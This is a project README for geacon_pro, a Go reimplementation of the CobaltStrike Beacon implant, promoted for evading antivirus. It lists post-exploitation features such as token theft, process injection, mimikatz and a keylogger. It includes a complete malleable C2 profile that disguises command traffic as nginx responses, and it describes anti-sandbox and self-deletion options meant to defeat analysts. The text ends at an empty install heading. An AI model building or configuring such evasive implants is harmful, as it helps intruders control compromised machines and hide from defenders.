geacon_pro: cross-platform CobaltStrike Beacon bypass anti-virus

geacon_pro

geacon_pro is an Anti-Virus bypassing CobaltStrike Beacon written in Golang based on the geacon project.

geacon_pro supports CobaltStrike version 4.1+

geacon_pro has implemented most functions of Beacon.

The core of bypassing Anti-Virus can be reflected in three aspects:

• There is no CobaltStrike Beacon feature.
• Viruses written in Golang can bypass the detection of antivirus software to a certain extent.
• Some dangerous functions which can be easily detected by antivirus software has been changed to more stealthy implementations.

Functions

Windows platform:

sleep, shell, upload, download, exit, cd, pwd, file_browse, ps, kill, getuid, mkdir, rm, cp, mv, run, execute, drives, powershell-import, powershell, execute-assembly, Multiple thread injection methods (you can replace the source code yourself), inject, shinject, dllinject, pipe, Various CobaltStrike native reflection dll injection (mimikatz, portscan, screenshot, keylogger, etc.), steal_token, rev2self, make_token, getprivs, proxy, delete self, timestomp, etc. Supports reflectiveDll, execute-assembly, powershell, powerpick, upload and execute, and other functions of cna custom plugins.

Linux, Mac platform:

sleep, shell, upload, download, exit, cd, pwd, file_browse, ps, kill, getuid, mkdir, rm, cp, mv, delete self, etc.

Process management and file management support graphical interaction.

C2profile:

geacon_pro adapts the settings on the flow of C2profile and some settings on the host. The supported encoding algorithms are base64, base64url, mask, netbios, netbiosu. Details can be found in the config.go. Here is an example C2profile. IMPORTANT!!! After modifying the C2profile, do not forget to sync the changes in the config.go:

# default sleep time is 60s

set sleeptime "3000";

set jitter "7";



https-certificate {

    set C "KZ";

    set CN "foren.zik";

    set O "NN Fern Sub";

    set OU "NN Fern";

    set ST "KZ";

    set validity "365";

}



# define indicators for an HTTP GET

http-get {



	set uri "/www/handle/doc";



	client {

		#header "Host" "aliyun.com";

		# base64 encode session metadata and store it in the Cookie header.

		metadata {

			base64url;

			prepend "SESSIONID=";

			header "Cookie";

		}

	}



	server {

		# server should send output with no changes

		#header "Content-Type" "application/octet-stream";

		header "Server" "nginx/1.10.3 (Ubuntu)";

    		header "Content-Type" "application/octet-stream";

        	header "Connection" "keep-alive";

        	header "Vary" "Accept";

        	header "Pragma" "public";

        	header "Expires" "0";

        	header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";



		output {

			mask;

			netbios;

			prepend "data=";

			append "%%";

			print;

		}

	}

}



# define indicators for an HTTP 

http-post {

	# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]

	set uri "/IMXo";

	client {

		#header "Content-Type" "application/octet-stream";				



		# transmit our session identifier as /submit.php?id=[identifier]

		

		id {				

			mask;

			netbiosu;

			prepend "user=";

			append "%%";

			header "User";

		}



		# post our output with no real changes

		output {

			mask;

			base64url;

			prepend "data=";

			append "%%";		

			print;

		}

	}



	# The server's response to our HTTP POST

	server {

		header "Server" "nginx/1.10.3 (Ubuntu)";

    		header "Content-Type" "application/octet-stream";

        	header "Connection" "keep-alive";

       	 	header "Vary" "Accept";

        	header "Pragma" "public";

        	header "Expires" "0";

        	header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";



		# this will just print an empty string, meh...

		output {

			mask;

			netbios;

			prepend "data=";

			append "%%";

			print;

		}

	}

}



post-ex {

    set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";

    set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";

    

    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";

    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";

    set keylogger "SetWindowsHookEx";

}

custom settings

There are some custom settings in the config.go:

• Proxy sets the function of sending packets by proxy. You can find details in Implementation Details.
• Remark can be used to remark the machine, which is convenient for distinguishing different application scenarios. That is, if Remark=”test”, the name of the online machine will be set as ComputerName [test].
• ExecuteKey can perform simple anti-sandbox. If the key value is “password”, the geacon_pro.exe password is required to execute after setting. The sandbox or blue team members cannot execute because they do not know the key.
• ExecuteTime can perform simple anti-sandbox. If the current time is later than the set time, the execution will fail. the set time is UTC time zone。
• DeleteSelf sets whether to delete itself.
• HideConsole sets whether to hide the console.
• CommandReadTime sets the interval for asynchronous real-time echo when executing long-duration commands.

Install & Use